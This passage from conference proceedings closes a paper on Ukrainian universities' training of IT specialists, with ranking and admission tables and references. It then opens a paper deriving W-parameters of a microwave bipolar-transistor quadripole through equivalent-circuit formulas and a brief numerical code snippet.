The universities in the top three for the training of IT professionals are quite powerful and efficient, as their high rankings show. Thus, in the Ukrainian TOP-200 ranking of higher education institutions during 2018–2022, the National Technical University of Ukraine "Igor Sikorsky Kyiv Polytechnic Institute" took first place in 2018 and 2020 and second place in 2019 and 2021–2022 (Rating 2022). Lviv Polytechnic National University ranked fourth in the TOP-200 in 2019, 2021, and 2022 and fifth in 2018 and 2020. Kharkiv National University of Radio Electronics ranked 9th in the TOP-200 in 2020 and 2022 and as low as 23rd in 2018. In addition, all three leading universities were among the eleven Ukrainian universities included in 2022 in the QS World University Rankings 2023 (QS 2022). Moreover, the first two universities of our ranking were consistently included in the QS World University Rankings 2020–2022. Thus, it can be argued that the high demand among entrants for the educational services of Ukraine's leading IT universities is supported by the recognition of these institutions at the global level. A university's high rating in the educational environment of Ukraine and the world guarantees strong demand for its services among applicants, as well as the opportunity to select the best of them (Table 3, Appendices).

Based on the information systematized in the databases of the Competition information system and the Statistics of Admission Campaigns portal, the table compares the main indicators of the 2021 and 2020 admission campaigns for the three leading universities in IT education in Ukraine. To ensure comparability of the data, the information is given for a single specialty, the most common in the country: 122. To put the leading universities' values into perspective, a Cherkasy university, namely Cherkasy State Technological University, has also been added to the table. We can conclude that for the most part there are positive changes in the values of all indicators and, most importantly, that the leading universities attract the most talented applicants; we can therefore predict that graduates of these institutions will have the highest level of competitiveness in Ukraine and the world.
It should also be noted the features of each of the considered programs, which is mainly related to their specific focuses, professional orientation, resource characteristics and capabilities of the educational institution, which they use in the training of IT professionals. Graduates of these universities are proud of Ukraine, they are part of the elite of IT professionals and
The Potential of Higher Education in Ukraine
587
they have a high responsibility to find ways not only to quickly compensate for all lost technologies in various spheres of economic activity through hostilities, bombing and occupation, but also to significantly increase technical and technological level of the country in all spheres of economic activity. At the same time, in order to stimulate continuous development, Ukraine’s IT education should focus on the world’s best practices. According to QS World University Rankings 2023 (QS 2022), the first place in the world among universities is occupied by the Massachusetts Institute of Technology, which specializes in, among others, the IT field. At the same time, more important is the fact that during 2019–2022 this university took the first place in the Graduate Employability Ranking (QS Graduate 2022). That is, the level of employment in the profession and values in the global labor market graduates of the Massachusetts Institute of Technology have the highest performance in the world. A study of the Massachusetts Institute of Technology’s bachelor’s degree programs in computer science has revealed their clear application, which is one of the conditions for high demand for specialists. Thus, in 2022 the institution has opened six bachelor’s programs: Electrical Science and Engineering; Electrical Engineering and Computer Science; Computer Science and Engineering; Computer Science and Molecular Biology; Computation and Cognition; Urban Science and Planning with Computer Science; Computer Science, Economics, and Data Science (Massachusetts 2022). Given the degree of potential needs of Ukraine’s economy in the postwar period, we can predict that specialists in such specialties would be in high demand. The peculiarities of training IT specialists at the Massachusetts Institute of Technology are the orientation in the educational process on such principles as innovation, flexibility, ingenuity, practical orientation and modeling and abstract thinking. Among the courses that fill the curriculum for each bachelor’s program, 10–15% of the courses by name coincide with the disciplines taught by Ukrainian universities-leaders in the IT field in specialty number 122. Moreover, the coincidence is observed with the block of disciplines that are the same for all leading universities in IT education in Ukraine. However, most courses at the Massachusetts Institute of Technology are applied, namely: Software Performance Engineering; Introduction to Design Thinking and Innovation in Engineering; Design Thinking and Innovation Leadership for Engineers; Engineering Leadership Lab. Disciplines of this kind should be introduced at least in the sample of disciplines. The practical orientation of education at the Massachusetts Institute of Technology is ensured not so much by the choice of practical areas of study, graduates of which will be in demand on the labor market, but by close cooperation with business in conducting scientific research. Thus, the Massachusetts Institute of Technology cooperates with more than 60 centers, laboratories and programs of world importance, which provide an opportunity for practical consolidation of the knowledge acquired by students and scientific verification of all declared hypotheses in practice. Among such laboratories and centers should be mentioned CSAIL, CISR, J-CLINIC, J-PAL, J-WEL, J-WAFS, CBA, MTL, SMART and others. 
The importance of training a sufficient number of highly qualified IT specialists is confirmed by the annually growing need of the Ukrainian economy for experienced and competent specialists. Thus, according to GlobalLogic, over the past three years
the annual need for IT professionals in the labor market of Ukraine has increased by an average of 30%, reaching 54 thousand people in 2021 (IT 2021). In 2022, due to Russia's military aggression, the labor market is suffering a significant decline, but even against the needs of the previous year, higher education institutions in Ukraine would not be able to meet the demand, as currently only 8,172 people in the country are studying for a master's degree in the field, i.e., 15% of the available requests from employers (Register 2022). At the same time, the vast majority of master's students do not yet have practical experience in the IT field, so the moment of their employment may be delayed, further aggravating the situation in the IT segment of Ukraine's labor market. Therefore, the way out of this situation should be a clear focus of educational programs on market needs and a strengthening of their practical component through close cooperation with stakeholders throughout the training period. An important condition should also be the creation of specialized testbeds, branches, and research laboratories on the basis of Ukrainian higher education institutions or stakeholder enterprises. The purpose of such entities should be to work out and consolidate theoretical knowledge in practice, to have students solve tasks commissioned by enterprises, and to involve students in the implementation of both simulated and real IT projects. This will increase the level of employment of graduates in their specialty and the demand of applicants for the services of higher education institutions, not only at the leading universities but throughout the country. In addition, a student's active participation during training in the activities of specialized laboratories will increase his or her value on the labor market, expand his or her professional resume, and raise his or her status from Trainee to Junior, or even to Middle.

In the current crisis of the Ukrainian economy, the motivation of IT professionals is based on the level of wages. Today, the average salary of an IT specialist in Ukraine is UAH 20,000 (work 2022), while in Moldova and Armenia salaries in the IT sector start from UAH 40,000, and in Cyprus the average salary of IT specialists ranges from UAH 135,000 for specialists of Middle status up to UAH 250,000 for specialists of Senior status (What 2022). At the moment, experienced IT specialists of Ukraine have a high chance of entering the world IT market on an outsourcing basis. At the same time, the imperfection of Ukrainian legislation in the IT sphere and procedures for the use of outsourcing that remain unregulated at the normative level cause significant difficulties in choosing a model of work and drive Ukrainian IT professionals into the shadow sector. If within a year we can at least come closer to solving this problem at the regulatory level, it will be an impetus for the formalization of IT professionals in the labor market, expanding the opportunities for their involvement in economic recovery projects in the post-war period, accelerating innovation growth, and developing smart economy projects at the regional and national levels.
The role of the IT sector in filling the country's budget with export revenues is especially important. According to the calculations and forecasts of GlobalLogic specialists, in 2022 Ukraine will be able to reach the 2021 level of export revenues from the IT sector, i.e., not less than $7 billion (The IT 2022). As confirmation of this possibility, experts cite the revenues generated by the industry in the first quarter of 2022, namely $2 billion, a record level for the IT sphere of Ukraine. Experts also state that today the IT sector of Ukraine loses up to $12 million a month due to a significant shortage of specialists (The IT 2022). Under war conditions, the growth of revenues from the IT industry will make it possible to increase the defense capability of the Ukrainian army and will contribute to providing the population of the country with everything necessary. In the post-war period, export revenues from the IT sector should become the basis for the recovery of Ukraine's economy, which has suffered from the actions of the aggressor. In addition, today the country's economy needs the introduction of new innovative approaches to management, the automation and computerization of production processes, and access to new standards of activity in all areas, drawing on the results of scientific research. Therefore, any effort aimed at increasing the number of competitive, highly motivated, and competent IT specialists in the labor market of Ukraine should become a lever for increasing the speed of the post-war recovery of the country's economy.
4 Conclusions

The study, based on an analysis of the ability of higher education institutions in Ukraine to produce a sufficient number of highly professional and competitive IT specialists, substantiates the current opportunities for rapid recovery and growth of the technical, technological and innovative level of Ukraine's economy in the postwar period. The factors influencing the motivation of Ukrainian IT specialists to apply their accumulated knowledge and skills toward increasing the competitiveness of Ukraine's economy are substantiated. A comparison of the focus and content of the educational programs of leading universities training IT professionals in Ukraine and in leading countries around the world makes it possible to formulate the main vectors for the further development of IT education in Ukraine.
5 Appendices
Table 1. Territorial distribution and characteristics of higher education institutions of Ukraine that provide training for IT professionals. Columns: (1) number of higher education institutions where specialists in the field of knowledge №12 are trained, units; (2) general contingent of students of higher education within the field of knowledge №12, persons; (3) average number of students per institution, persons; (4) number of specialties within the field of knowledge №12 that can be obtained in the city; (5) code of the specialty within the field of knowledge №12 that has the largest number of students in the city (121–126); (6) number of educational institutions that provide educational services in the most common specialty in the city, units; (7) number of students who acquire the most common specialty in the city, persons; (8) average number of students in the most common specialty in the city per one higher education institution, persons; (9) smallest contingent of students in a higher education institution that provides educational services in the most common specialty in the city, persons; (10) largest contingent of students in such an institution, persons.

| City | (1) | (2) | (3) | (4) | (5) | (6) | (7) | (8) | (9) | (10) |
|---|---|---|---|---|---|---|---|---|---|---|
| Kyiv | 35 | 24646 | 529 | 6 | 122 | 29 | 7603 | 262 | 2 | 1626 |
| Kharkiv | 14 | 14026 | 1002 | 6 | 122 | 9 | 4598 | 511 | 15 | 1860 |
| Lviv | 11 | 9400 | 855 | 6 | 122 | 10 | 4804 | 480 | 43 | 2438 |
| Odesa | 11 | 4783 | 435 | 6 | 122 | 8 | 2100 | 263 | 44 | 953 |
| Dnipro | 10 | 5272 | 528 | 6 | 122 | 10 | 2086 | 209 | 82 | 545 |
| Zaporizhzhia | 8 | 2264 | 283 | 6 | 121 | 5 | 1097 | 219 | 22 | 471 |
| Mykolaiv | 8 | 1622 | 203 | 6 | 122 | 5 | 601 | 120 | 4 | 286 |
| Poltava | 6 | 1077 | 180 | 4 | 122 | 4 | 548 | 137 | 18 | 257 |
| Ivano-Frankivsk | 5 | 1629 | 326 | 4 | 121 | 5 | 925 | 185 | 66 | 486 |
| Lutsk | 5 | 1067 | 213 | 4 | 122 | 3 | 319 | 106 | 38 | 158 |
| Cherkasy | 5 | 854 | 171 | 6 | 121 | 3 | 273 | 91 | 3 | 154 |
| Ternopil | 4 | 2538 | 635 | 6 | 122 | 4 | 940 | 235 | 20 | 360 |
| Vinnytsia | 4 | 2317 | 579 | 6 | 122 | 3 | 800 | 267 | 147 | 364 |
| Zhytomyr | 4 | 1249 | 312 | 6 | 121 | 1 | 573 | 573 | – | – |
| Kryvyi Rih | 4 | 562 | 141 | 3 | 121 | 2 | 356 | 178 | 150 | 206 |
| Sumy | 3 | 981 | 327 | 3 | 122 | 2 | 848 | 424 | 22 | 826 |
| Chernihiv | 3 | 785 | 262 | 4 | 123 | 1 | 422 | 422 | – | – |
| Rivne | 3 | 682 | 227 | 4 | 122 | 3 | 306 | 102 | 50 | 173 |
| Kropyvnytskyi | 3 | 525 | 175 | 3 | 123 | 1 | 234 | 234 | – | – |
| Khmelnytskyi | 2 | 1388 | 694 | 5 | 123 | 2 | 494 | 247 | 75 | 419 |
| Chernivtsi | 2 | 1095 | 547 | 6 | 122 | 2 | 495 | 248 | 98 | 397 |
| Uzhhorod | 1 | 919 | 919 | 6 | 121 | 1 | 376 | 376 | – | – |

Source: Register 2022
Table 2. Characteristics of higher education institutions that are leaders in Ukraine in the contingent of IT graduates. For each institution: the general contingent of applicants for higher education within the field of knowledge №12 (persons), and the contingent of applicants in each specialty as % of the total contingent of applicants within the specialty: 121 Software Engineering, 122 Computer Science, 123 Computer Engineering, 124 System Analysis, 125 Cybersecurity, 126 Information Systems and Technologies.

| Institution of higher education | Contingent (№12), persons | 121 | 122 | 123 | 124 | 125 | 126 |
|---|---|---|---|---|---|---|---|
| National Technical University of Ukraine "Igor Sikorsky Kyiv Polytechnic Institute" | 7118 | 10.8 | 5.7 | 7.8 | 18.4 | 5.4 | 23.1 |
| Lviv Polytechnic National University | 5848 | 3.6 | 8.5 | 6.9 | 9.9 | 9.5 | 7.9 |
| Kharkiv National University of Radio Electronics | 5605 | 6.1 | 6.5 | 9.9 | 2.4 | 9.1 | 2.0 |

Source: Register 2022
Table 3. Characteristics of the leading universities in IT education in Ukraine according to the indicators of the 2021 and 2020 admission campaigns in the specialty 122 Computer Science at the bachelor's level of full-time education (each cell gives the 2021 / 2020 values).

| Institution of higher education | Avg. rating score, budget admission | Avg. rating score, contract admission | Applications submitted | Enrolled in budget-funded places, persons | Competition per budget place, persons |
|---|---|---|---|---|---|
| National Technical University of Ukraine "Igor Sikorsky Kyiv Polytechnic Institute" | 189.35 / 192.42 | 174.92 / 170.96 | 2583 / 2054 | 94 / 102 | 13.12 / 12.45 |
| Lviv Polytechnic National University | 192.38 / 190.26 | 171.56 / 164.44 | 2462 / 2070 | 305 / 272 | 6.21 / 7.61 |
| Kharkiv National University of Radio Electronics | 191.22 / 190.16 | 161.85 / 160.56 | 1212 / 937 | 59 / 52 | 13.03 / 13.46 |
| Cherkasy State Technological University | 188.52 / 164.16 | 146.44 / 149.67 | 152 / 64 | 5 / 3 | 18.00 / 15.67 |
Source: Information 2022

Table 4. The main provisions of educational programs within the specialty 122 Computer Science (KPI – National Technical University of Ukraine "Igor Sikorsky Kyiv Polytechnic Institute"; LPNU – Lviv Polytechnic National University; KhNURE – Kharkiv National University of Radio Electronics).

Title
– KPI: Intelligent Service-Oriented Distributed Computing
– LPNU: Computer Science
– KhNURE: Computer Science

Goal
– KPI: Training of specialists capable of solving problems in the field of computer science and information technology related to the development and maintenance of high-performance software of complex information systems and technological complexes, using intelligent distributed computing technologies and resources of modern computing environments
– LPNU: Acquisition of knowledge, skills and understanding related to software development, design of information systems, networks and computer programs, information technology tools, computer design systems, computer intelligent decision-making systems, computer design and security features in the field of information technology
– KhNURE: Training of highly qualified specialists who have a system of knowledge in the field of information technology, have mastered modern research in computer science, and are able to formulate and solve practical problems using fundamental and special methods and technologies of computer science and technology

Features
– KPI: Application of the latest concepts and models of modern theory and practice of building algorithmic, mathematical, software and hardware components of computer systems
– LPNU: Develops promising areas for modeling the development of modern software packages and in-depth knowledge of analysis and synthesis of data and knowledge in the early stages of building information systems; structural and object-oriented approaches to software system design are developed
– KhNURE: Study of the theoretical foundations of computer science, acquisition of competencies in the field of information technology, tools for obtaining, presenting, processing, analysis, transmission and storage of data in intelligent information systems

Disciplines of professional and practical training
– KPI: Object-oriented programming; Systems modeling; Methods and systems of artificial intelligence; Computer networks; Technologies for creating software services; Information systems security; Operating systems; Algorithmization and programming; Database systems; Fundamentals of systems analysis; Information systems design; Algorithms and data structures; Computer systems architecture; Optimization methods; Parallel calculations
– LPNU: Object-oriented programming; Computer circuitry and computer architecture; Computer networks; Technology for creating software products; Information protection technologies; Algorithms and data structures; Web technologies; Software quality and testing; Client-server programming; Development and administration of databases; Information theory and coding; Interfaces and data protocols; Cross-platform programming; Internet technology; Development of computer games; Data warehouse technologies
– KhNURE: Object-oriented programming; Systems modeling; Methods and systems of artificial intelligence; Computer networks; Information protection technologies; Operating systems and system programming; Computer circuitry and computer architecture; Technology of creating software systems; Web technologies and web design; Computer-aided design technologies; Cross-platform programming; Design of information systems; IT project management; Distributed systems and parallel computing technologies

Knowledge acquired by an IT specialist
– KPI: Preparing graduates for successful professional activities in the field of computer technology on the basis of in-depth basic training, which includes, inter alia, the study of algorithms, artificial intelligence, intelligent distributed (cloud, fog and serverless) computing technologies, and the ability to quickly master new technologies and systems
– LPNU: Principles of development and operation of information systems; application software development technologies; distributed systems and parallel computing; computer engineering; methods of data mining and decision making; support of teamwork; creation of local and network databases and knowledge bases, Internet services; use of modern graphic modeling and design tools for designing Web-oriented systems; execution of automated information processing
– KhNURE: Principles of the exchange and processing of information in various systems; methods of organization of information storage; technology for the development, implementation and modernization of information systems; programming languages, databases, computer networks, system analysis; designing and creating new software and information systems; management of IT projects; development of Internet sites based on knowledge of Internet and Web technologies; development of computer games; development of corporate-level systems; development of mobile applications for Android, Windows Phone, iOS; development and administration of databases; software testing

Employment opportunities
– KPI: Database administrator; engineer of automated production management systems; computer systems engineer; computer software engineer
– LPNU: Information technology specialist; developer of information systems; system administrator; information and computer network administrator; specialist in maintenance and repair of computer equipment; database administrator; informatization consultant; computer systems engineer
– KhNURE: Business analyst; computer systems analyst; project manager; developer of intellectual and information systems; system architect; Java, C++, C#, PHP programmer; Quality Control / Quality Assurance specialist; developer and administrator of MySQL and Oracle databases; system administrator

Source: National 2022; Lviv 2022; Kharkiv 2022
References

Iden, J., Langeland, L.: Setting the stage for a successful ITIL adoption: a Delphi study of IT experts in the Norwegian Armed Forces. Inf. Syst. Manag. 27(2), 103–112 (2010)
Information System Competition. Introductory Company 2021–2022 (2022). http://www.vstup.info
IT in Ukraine: Figures, Opportunities, and Challenges. DLF (2021). https://dlf.ua/en/it-in-ukraine-figures-opportunities-and-challenges/
Kharkiv National University of Radio Electronics. Specialty 122 – Computer Science (2022). https://nure.ua/en/applicants/specialties-and-specialization/specialty-122-computer-science
Lviv Polytechnic National University. Specialty 122 – Computer Science (2022). http://directory.lpnu.ua/majors/IBIT/6.122.00.00/8/2022/ua/full
Massachusetts Institute of Technology. Computer Science (2022). https://www.eecs.mit.edu/research/computer-science/
National Technical University of Ukraine "Igor Sikorsky Kyiv Polytechnic Institute". Intelligent Service-Oriented Distributed Computing (2022). https://osvita.kpi.ua/sites/default/files/opfiles/122_OPPB_ISORO_2022.pdf
Opel, S., Netzer, C.M., Desel, J.: AsTRA – an assessment tool for recognition and adaptation of prior professional experience and vocational training. IFIP Adv. Inf. Commun. Technol. 642, 222–233 (2022)
Pasichnyk, V., Kunanets, N.: IT education and IT business in Ukraine: responses to the modern challenges. In: 10th International Scientific and Technical Conference on Computer Sciences and Information Technologies, pp. 48–51. Lviv (2015)
Portrait of an IT specialist – 2019. Infographic (2019). https://dou.ua/lenta/articles/portrait-2019/
Pröbster, M., Hermann, J., Marsden, N.: Digital training in tech – a matter of gender? In: ACM International Conference Proceeding Series, pp. 11–18 (2018)
Proskura, S.L., Lytvynova, S.G.: Organization of independent studying of future bachelors in computer science within higher education institutions of Ukraine. In: Proceedings of the 14th International Conference on ICT in Education, Research and Industrial Applications. Integration, Harmonization and Knowledge Transfer, vol. II: Workshops, 2104, pp. 348–358 (2018)
QS Graduate Employability Rankings 2022 (2022). https://www.topuniversities.com/university-rankings/employability-rankings/2022
QS World University Rankings 2023: Top Global Universities (2022). https://www.topuniversities.com/university-rankings/world-university-rankings/2023
Rating of Ukrainian Higher Education Institutions "TOP-200 Ukraine" for 2018–2022 (2022). http://osvita.ua/vnz/rating/86578/
Register of Subjects of Educational Activity. The Only State Electronic Database on Education (2022). https://info.edbo.gov.ua/
Resolution of the Cabinet of Ministers of Ukraine "On approval of the list of branches of knowledge and specialties in which the training of higher education is carried out" №266 from 29.04.2015. http://vnz.org.ua/zakonodavstvo/101-perelik-galuzej-znan-i-spetsialnostej
Statistics of introductory companies. Introduction 2012–2021. http://abit-poisk.org.ua/stat
The IT Industry May Reach Last Year's Figures. GlobalLogic Named the Terms (2022). https://www.globallogic.com/ua/about/news/it-industry-export-income/
Ukraine IT Report 2021. IT Ukraine Association (2021). https://drive.google.com/file/d/1LujaT9pHEGhgpRRojfnlZgQikkyiIlbE/view
What are the salaries of IT professionals abroad? (2022). https://zakordon.24tv.ua/yaki-sumi-otrimuyut-it-fahivtsi-za-kordonom_n1703701
Wiggberg, M., et al.: Effective reskilling of foreign-born people at universities – the software development academy. IEEE Access 10, 24556–24565 (2022)
work.ua (2022). https://www.work.ua/ru/jobs-it/
Information Security
Standard and Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor for Devices of Infocommunication Systems Andriy Semenov1(B) , Oleksandr Voznyak2 , Andrii Rudyk3 , Olena Semenova1 , Pavlo Kulakov4 , and Anna Kulakova5 1 Faculty for Infocommunications, Radioelectronics and Nanosystems, Vinnytsia National
Technical University, 95 Khmelnytske Shose St., Vinnytsia 21021, Ukraine [email protected] 2 Department of Electrical Engineering Systems, Technologies and Automation On Agro-Industrial Complex, Vinnytsia National Agrarian University, 3 Soniachna St., Vinnitsia 21008, Ukraine 3 Department of Automation, Electrical Engineering and Computer-Integrated Technologies, National University of Water and Environmental Engineering, 11 Soborna St., Rivne 33028, Ukraine [email protected] 4 Department of Information Technologies, Uman National University of Horticulture, 1 Institutska St., Uman, Cherkassy Region 20305, Ukraine [email protected] 5 Faculty for Computer Systems and Automation, Vinnytsia National Technical University, 95 Khmelnytske Shose St., Vinnytsia 21021, Ukraine
Abstract. Characteristics of microwave-range devices can be improved by applying both a new element base and new circuit solutions. A promising direction is to apply the reactive properties of transistors and transistor structures with negative resistance for constructing information-measuring systems and operational and computing devices of the microwave range. To substantiate the proposed methods, experimental results obtained with the proposed methods and measuring equipment should be compared for the W-parameters of real potentially unstable quadripoles. Bipolar transistors, which exhibit potential instability over a wide frequency range, are suggested for use as such quadripoles. In the paper, mathematical models of the W-parameters of such structures are developed and their parameters are estimated over the frequency range. Keywords: W-parameters · active quadripole · bipolar transistor · electrical parameters · equivalent circuit · mathematical model · microwave
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 599–618, 2023. https://doi.org/10.1007/978-3-031-35467-0_36
1 Introduction

The active quadripole is a model of the transistor [1, 2]. Its W-parameters can be determined either experimentally for specific conditions [3, 4] or calculated by means of a physical transistor substitution circuit [5, 6]. In most cases, the calculation path is preferable because it yields analytical expressions for the quadripole, which is important when analyzing the influence of various factors on the characteristics of the studied circuit [7, 8]. Physical circuits for a bipolar transistor are obtained by considering the charge transfer processes in the transistor [9, 10]; they can be found in a large number of articles [5, 11]. Depending on the construction method of the so-called theoretical transistor model, which describes the processes of carrier drift and diffusion in the base region, there are U- and T-shaped circuits. The U-shaped circuit was proposed by Giacoletto and was later justified for drift transistors. Its advantage is the well-known simplicity of simulating its properties over a wide frequency range [12]. The internal elements of the circuit model the processes of accumulation, recombination and transfer of charge carriers across the base region [9]; the inclusion of external elements in the equivalent circuit is explained by the transistor design [10]. The inertial properties of transistors appear at relatively low frequencies and should be taken into account over the entire transistor operating range [3, 4]. The theoretical model is valid for frequencies f ≤ 2fT (where fT is the limit frequency) [12, 13]. At higher frequencies, it is necessary to take into account the parasitic reactive parameters of real transistors, first of all the inductance of the terminals [7]. A T-type equivalent transistor circuit in simplified form was proposed by Pritchard [14]. It has several varieties differing in the configuration of the circuit consisting of the base material resistance and the collector junction capacitance [14]. Upon careful examination, the T- and U-shaped equivalent circuits of the transistor differ only in the configuration of their internal part, that is, the theoretical model [14]. At high frequencies, the U- and T-circuits are not exact mutual equivalents; this is due to the approximation used in the transition from one circuit to another. However, the frequency characteristics of the circuits are very close [13, 14]: each of them models the processes in the transistor with approximately the same accuracy, and in this sense they are equivalent [13, 14]. Electrical industry facilities are making great efforts to improve the quality and efficiency of their products. Measuring semiconductor parameters receives great attention because these parameters play a crucial role in developing and constructing electronic equipment. It is especially difficult to define semiconductor device parameters in the microwave range, which is a range of potential instability, because one needs to measure the parameters in the operating frequency range to obtain the necessary information. That is why developing new, more efficient methods and means for measuring the parameters of potentially unstable semiconductor devices is a challenging task. The aim of the work is to develop methods for determining the W-parameters of potentially unstable microwave active multipoles.
The main tasks of the work are: 1) to determine the transistor quadripole parameters in the frequency range of their potential instability; 2) to estimate the adequacy of the proposed methods using a numerical experiment; 3) to discuss the results and draw conclusions from them.
To analyze the parameters of the bipolar transistor as an active quadripole, we use an equivalent T-shaped substitution circuit [14]. Since the dimensions of modern microwave transistor structures do not exceed 0.01 of the minimum wavelength, the internal structure of the microwave transistor can be represented by a circuit consisting of lumped elements. There are many such equivalent circuits of varying degrees of accuracy [15, 16]. Practice shows that refining an equivalent circuit does not significantly improve the accuracy of calculations, due to the low accuracy of determining the parameters of its elements. In addition, the calculation formulas obtained from a complex circuit are cumbersome, difficult to compute and lack clarity, and the assumptions introduced to simplify such formulas also reduce the accuracy of calculations. In this regard, it is advisable to choose a relatively simple physical equivalent circuit of the transistor whose parameters can be coordinated with more accurate experimental characteristics, that is, to adjust the parameters of the equivalent circuit so that its output electrical parameters (Y-parameters) correspond to the experimental ones [11]. In view of the above, we use the T-shaped equivalent Pritchard circuit (Fig. 1), supplemented by the reactive elements of the case and the terminals of the transistor [14, 17].
Fig. 1. T-shaped equivalent circuit of the bipolar transistor [14, 17]. In this circuit: h21 is the current transfer ratio of the transistor measured in the common-base circuit; CC1 and CC2 are the active and passive capacitances of the collector junction; CE and rE are the barrier capacitance and differential resistance of the emitter junction; LE, LB, LC are the inductances of the emitter, base and collector terminals; C1, C2, C3 are the capacitances between the base, emitter and collector terminals and the case (ground).
2 Estimating Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor

The procedure for determining the parameters of this circuit is given in [14, 15]. To perform a numerical experiment for determining the quadripole parameter system Re(W12W21), Im(W12W21), W11, W22, |W12|, |W21|, which is proposed as a system of nonstandard quadripole parameters [18–20], it is necessary to derive the calculation formulas and the sequence for determining the elements of the nonstandard system. Let us use the equivalent circuit of the bipolar transistor and consider the case of the transistor connected in the common-collector circuit (Fig. 2), which is potentially unstable up to the maximum generation frequency of the transistor fmax [15].
Fig. 2. Quadripole circuit on a common-collector bipolar transistor. The values of the reactive elements of the terminals C1, C2, C3, LE, LB, LC in Fig. 1 depend on the construction of the transistor and the method of its installation in the circuit. Therefore it is advisable to consider them external to the quadripole and to attribute them to the generator immittance WG and the load immittance WL.
Consider the equivalent circuit for the transistor connected in the common-collector configuration. The inductance of the common terminal has a significant influence on the quadripole parameters; however, to simplify the analysis at the first stage, it can be neglected. Given these assumptions, the equivalent circuit (Fig. 2) takes the form shown in Fig. 3. We write down the conductivity matrix for this circuit [14, 17]:

$$\|Y_C\| = \begin{Vmatrix} Y_{11C} & Y_{12C} \\ Y_{21C} & Y_{22C} \end{Vmatrix} = \begin{Vmatrix} \dfrac{z + r_B}{z\,r_B} & -\dfrac{1}{r_B} \\[2mm] -\dfrac{1}{r_B\,(1 - h_{21})} & \dfrac{z + r_B}{z\,r_B\,(1 - h_{21})} \end{Vmatrix}. \tag{1}$$
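As a quick numerical illustration, the matrix (1) is easy to evaluate in code. The sketch below follows the reading of (1) given above; the element values (r_B, h21 and the capacitance behind z) are placeholders chosen only for demonstration, not data from the paper.

```python
import numpy as np

def y_matrix_cc(z: complex, r_b: float, h21: float) -> np.ndarray:
    """Conductivity matrix (1) of the common-collector stage, built from
    the impedance z, base resistance r_B and current transfer ratio h21."""
    y11 = (z + r_b) / (z * r_b)
    y12 = -1.0 / r_b
    y21 = -1.0 / (r_b * (1.0 - h21))
    y22 = (z + r_b) / (z * r_b * (1.0 - h21))
    return np.array([[y11, y12], [y21, y22]])

# Placeholder values: f = 1 GHz, a 2 pF collector-junction branch, r_B = 30 Ohm.
f = 1e9
z = 1.0 / (1j * 2.0 * np.pi * f * 2e-12)
print(y_matrix_cc(z, r_b=30.0, h21=0.98))
```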
Fig. 3. Converted equivalent circuit of the bipolar transistor with common collector, where $z_A = \frac{1}{j\omega C_{C1}}$, $z = \frac{1}{j\omega C_{C2}}$, $z_E = \frac{r_E}{1 + j\omega r_E C_E}$.

Substituting the expressions for the elements of the matrix (1) into the expressions for the input and output conductivity [15, 16], after simple mathematical transformations we find expressions for the real and imaginary components of the input and output quadripole conductivities:

$$\mathrm{Re}\,Y_{IN.C} = \frac{1}{r_B}\,\frac{B_L \Omega_m^2 + \big(1 - \Omega_m^2 Q_L\big)}{B_L^2 \Omega_m^2 + \big(1 - \Omega_m^2 Q_L\big)^2}, \tag{2}$$

$$\mathrm{Im}\,Y_{IN.C} = \omega_m C_{C2} + \frac{r_B B_L - 1 + \Omega_m^2 Q_L}{r_B\big(B_L^2 Q_L^2 + \big(1 - \Omega_m^2 Q_L\big)^2\big)}, \tag{3}$$

$$\mathrm{Re}\,Y_{OUT.C} = \frac{1}{(1 + B_G)\,r_B} - \frac{\Omega_m^2 Q_G - 1 - I_G^2 \Omega_m^2 Q_m}{r_B\big(Q_G^2 \Omega_m^2 + \big(1 - I_G^2 \Omega_m^2\big)^2\big)}, \tag{4}$$

$$\mathrm{Im}\,Y_{OUT.C} = \omega_m C_{C1} - \frac{1}{r_B}\left(1 + \frac{\big(1 - I_G^2 \Omega_m^2\big) + Q_G^2 \Omega_m^2}{(1 + B_G)\big(Q_G^2 \Omega_m^2 + \big(1 - I_G^2 \Omega_m^2\big)^2\big)}\right), \tag{5}$$

where $B_L = 1 + r_B(\omega_m C_{C1} + \mathrm{Re}\,Y_L)$, $Q_L = \omega_m r_B (C_L + C_{C1})$, $B_G = r_B\,\mathrm{Re}\,Y_G$, $I_G = \omega_m^2 C_{C2} L_G$, $Q_G = \omega_m L_G (1 + B_G)/r_B$, and $\omega_m$ is the transistor cutoff frequency. Given the elements of the matrix (1), the maximum attainable power transfer coefficient at the stability limit is [15]

$$K_{mS} = \frac{\omega^2 + \omega_m^2}{\omega^2}. \tag{6}$$

Similarly, we obtain expressions for the input and output conductivity for the transistor circuits with a common base and a common emitter. For this, the formulas are
used [21] together with the already known conductivity matrix $\|Y_C\|$ (1). We then calculate the values of the input and output quadripole conductivities and, using the equations of the immittance circle, determine the parameters $\rho_{IN}$, $\rho_{OUT}$ and the centers $W_{IN0}$, $W_{OUT0}$ [18]. The parameters found are sufficient to numerically determine the nonstandard quadripole parameter system [17] using formulas (7) [22]:

$$\begin{cases}
\mathrm{Re}\,W_{22} = \dfrac{\rho'_{IN}\,\mathrm{Re}\,W_g}{\rho_{IN} - \rho'_{IN}},\\[2mm]
\mathrm{Re}\,W_{11} = \dfrac{\rho_{IN}}{\rho_{OUT}}\,\mathrm{Re}\,W_{22} = \dfrac{\rho_{IN}\,\rho'_{IN}}{\rho_{OUT}\,(\rho_{IN} - \rho'_{IN})}\,\mathrm{Re}\,W_g,\\[2mm]
|W_{12}W_{21}| = 2\rho_{IN}\,\mathrm{Re}\,W_{22} = \dfrac{2\rho_{IN}\,\rho'_{IN}}{\rho_{IN} - \rho'_{IN}}\,\mathrm{Re}\,W_g,\\[2mm]
\mathrm{Re}(W_{12}W_{21}) = 2\,\mathrm{Re}\,W_{22}\,\big(\mathrm{Re}\,W_{11} - \mathrm{Re}\,W_{IN.A}\big),\\[2mm]
\mathrm{Im}(W_{12}W_{21}) = \sqrt{|W_{12}W_{21}|^2 - \mathrm{Re}^2(W_{12}W_{21})},\\[2mm]
\mathrm{Im}(W_{12}W_{21}) = |W_{12}W_{21}|\,\sin\!\left(\arccos\dfrac{\mathrm{Re}(W_{12}W_{21})}{|W_{12}W_{21}|}\right),\\[2mm]
\mathrm{Im}\,W_{11} = \mathrm{Im}\,W_{IN.B} + \dfrac{\mathrm{Im}(W_{12}W_{21})}{2\,\mathrm{Re}\,W_{22}},\\[2mm]
